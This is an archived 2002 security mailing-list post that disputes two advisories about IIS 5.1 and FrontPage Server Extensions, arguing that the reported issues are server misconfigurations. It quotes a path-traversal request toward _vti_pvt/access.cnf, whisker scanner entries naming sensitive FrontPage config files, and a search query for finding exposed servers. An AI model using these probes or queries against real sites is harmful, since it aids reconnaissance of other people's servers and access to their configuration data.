Re: This is the CORRECTED POST please ignore the one befor same subject MULTIPLE Remote Issues with II5.1 on Windows XP

From: sozni (sozniat_private)
Date: Tue Feb 12 2002 - 07:50:45 PST

    I must clear up some issues on this advisory which is located at
    http://www.safehack.com/Advisory/IIS5webdir.txt as well as a previous
    advisory by the same author, NtWaK0, which is located at
    http://www.safehack.com/Advisory/shtmldump.txt

    Normally I wouldn't bother commenting on an advisory like this but
    when it comes to the FrontPage server extensions, vulnerabilities
    often get picked up by others without any verification.  Perhaps this
    is because so few really understand much about FPSE security.

    In this commentary I am going to address the specific issues
    mentioned in the original advisory.  My conclusions are based on my
    experience with FPSE security and actual testing on two separate
    Windows XP/IIS 5.1 installations as well as two Windows 2000/IIS 5.0
    installations.  I can provide specific documentation on my tests if
    anyone wishes to validate my research.

    The first issue to address is the claim that "_vti_bin/shtml.dll Can
    lead to REMOTE Exploit on IIS 5.1"  In the advisory located at
    http://www.safehack.com/Advisory/shtmldump.txt, the author claims
    that by sending the request GET /_vti_bin/shtml.dll that binary data
    was returned which incidentally is the binary contents of the
    shtml.dll file.  In other words, a GET request was made for shtml.dll
    and so the server sent the file shtml.dll back to the client.  If
    this request had been made in a normal web browser, the Save As
    dialog box would have popped up, asking where to save shtml.dll.

    This situation would occur if the _vti_bin directory did not have
    execute permissions and did have read permissions, which is not the
    case with a default installation.  The author seemed to imply that
    the previous malformed requests that were blocked by URLScan were the
    cause of the binary contents being returned, but did not state
    whether he had tried a successful GET request for shtml.dll before
    submitting those URL's.

    Nevertheless, even if the two malformed requests caused the binary
    contents of shtml.dll to be returned, that would by no means lead to
    a compromise of the system.  Having the remote web site's shtml.dll
    is hardly going to lead to a compromise of a web server.  This is NOT
    a vulnerability, but likely a misconfigured web server.

    This next three issues, addressed in the more recent advisory, are
    that certain files in the _vti_pvt directory will reveal information
    about the server.  However, by default, anonymous users do not have
    read or write permissions to the _vti_pvt directory or its contents.
    Even if the permissions were manually changed to allow reading of
    this file, this is an old issue.  Several years ago I had written a
    script for RFP's whisker scanner that was later integrated into the
    main scan.db.  This script snippet is as follows:

    # These can be used to learn more about the server
    scan () _vti_pvt >> access.cnf
    info - Contains HTTP server-specific access control information

    scan () _vti_pvt >> service.cnf
    info - Contains meta-information about the web

    scan () _vti_pvt >> services.cnf
    info Contains the list of subwebs.

    scan () _vti_pvt >> writeto.cnf
    info Contains information about form handler result files

    scan () _vti_pvt >> svcacl.cnf
    info - File used to store whether subwebs have unique permissions
    settings
    info - and any IP address restrictions.  Can be used to discover
    info - information about subwebs

    Default permissions were later tightened to prevent this information
    leak.  This issue is NOT a vulnerability unless the admin explicitly
    gives anonymous users access to this file.  By default, remote users
    do not have access to these files.  Again, this is a misconfigured
    server.

    The final issue is that /iishelp/common/colegal.htm will give access
    to other files.  The author states that the request GET
    /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf will
    return the contents of the access.cnf file.  The flaw with this is
    that colegal.htm is a simply an html file with static content.  There
    is some client-side javascript for browser support but no server-side
    code or server-side includes that would allow that file to access
    anything else on the system.  In fact, the colegal.htm file is not
    even being accessed in that request.  IIS will parse all of the ../'s
    which will take it to the web root (and ignore the extra ../'s) then
    down to the /_vti_pvt directory.  If NtWaK0 had his friend look at
    his web logs he will see that there was never any request for
    colegal.htm.  This is NOT a vulnerability.

    Even if it was vulnerable, since we know that a direct request to
    access.cnf on that misconfigured test server already returns the file
    contents, there is no proof that the colegal.htm request was
    successful.  The proper way to test this is to request a file and get
    an access denied error then repeat the test with the exploit to show
    that the exploit worked.

    In the two advisories I tested, I found nothing that was an actual
    vulnerability.  All of these issues were likely because the test
    server was not configured correctly.  Furthermore, none of these
    issues are specific to IIS 5.1.  Improperly configured FrontPage
    Server Extensions will exhibit this behaviour on any platform.

    Advisories such as this without any testing or confirmation by the
    vendor are what give security testers a bad name.  The author says
    that Microsoft was notified but does not mention anything about
    getting any response from them.  Where the author does not even have
    his own copy of IIS for testing, advisories such as these are better
    suited for vuln-dev. All of his tests were performed on a single XP
    system he did not install and therefore had not control over the
    configuration. Unverified vulnerabilities such as these make it
    difficult to sift through the ever-increasing amount of security
    information we are faced with every day.  I do not mean to insult
    this author, I certainly commend him for his effort and creativity,
    but I do feel like this advisory was irresponsible.  Even when I am
    absolutely sure of a security issue and have received confirmation
    from the vendor, I bounce my ideas off other security experts as a
    sanity check before sending anything out to the public.  Hopefully
    NtWaK0 and others will also do so in the future.

    One final note is that the author mentions that a search for
    "writeto.cnf" at google.com will return many results.  This statement
    is true.  While not a vulnerability in the FrontPage Server
    Extensions, it is a good indication of how many FrontPage webs are
    not properly secured.  However, keep in mind that many of those sites
    are running old versions of FPSE and many of those directory listings
    are sites that have FPSE disabled but the files were never removed
    from the site. Another more refined search for these servers is to
    search for "Index of /_vti_pvt/" (be sure to include the quotes in
    the search).

    sozni
    www.xato.net